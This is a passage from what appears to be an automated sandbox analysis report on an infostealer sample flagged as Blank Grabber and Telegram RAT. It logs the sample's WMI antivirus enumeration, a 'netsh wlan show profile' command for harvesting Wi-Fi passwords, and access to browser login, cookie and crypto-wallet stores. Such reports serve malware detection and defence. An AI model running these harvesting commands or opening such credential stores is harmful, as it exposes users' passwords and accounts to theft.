Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation

Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe

Code function: 0_2_00007FF73AE1C460 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00007FF73AE1C460

Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe

Code function: 0_2_00007FF73AE36370 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,

0_2_00007FF73AE36370

Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe

Code function: 68_2_00007FF7F7EC48CC GetModuleFileNameW,GetVersionExW,LoadLibraryW,LoadLibraryW,

68_2_00007FF7F7EC48CC

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Uses netsh to modify the Windows network and firewall settings

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\netsh.exe netsh wlan show profile

Source: C:\Windows\System32\wbem\WMIC.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct

Stealing of Sensitive Information

Yara detected Blank Grabber

Source: Yara match	File source: 00000002.00000002.2329026765.0000028C87B86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2322690660.0000028C87B63000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2041945157.000001CCD86C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2115215405.0000028C87D18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2324666281.0000028C87B77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2041945157.000001CCD86C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2326023533.0000028C87B85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2320597036.0000028C88DA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2323296128.0000028C87B76000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: #U202f#U202f#U2005#U00a0.scr.exe PID: 1788, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: #U202f#U202f#U2005#U00a0.scr.exe PID: 5260, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\_MEI17882\rarreg.key, type: DROPPED

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: #U202f#U202f#U2005#U00a0.scr.exe PID: 5260, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2115215405.0000028C87D18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Electrum
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2115215405.0000028C87D18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Jaxxz
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2115215405.0000028C87D18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Exodusz
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2115215405.0000028C87D18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Ethereum
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2115215405.0000028C87D18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal WLAN passwords

Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\favicons.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\ls-archive.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\3e445a25-c088-46bb-968a-82532b92e486	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
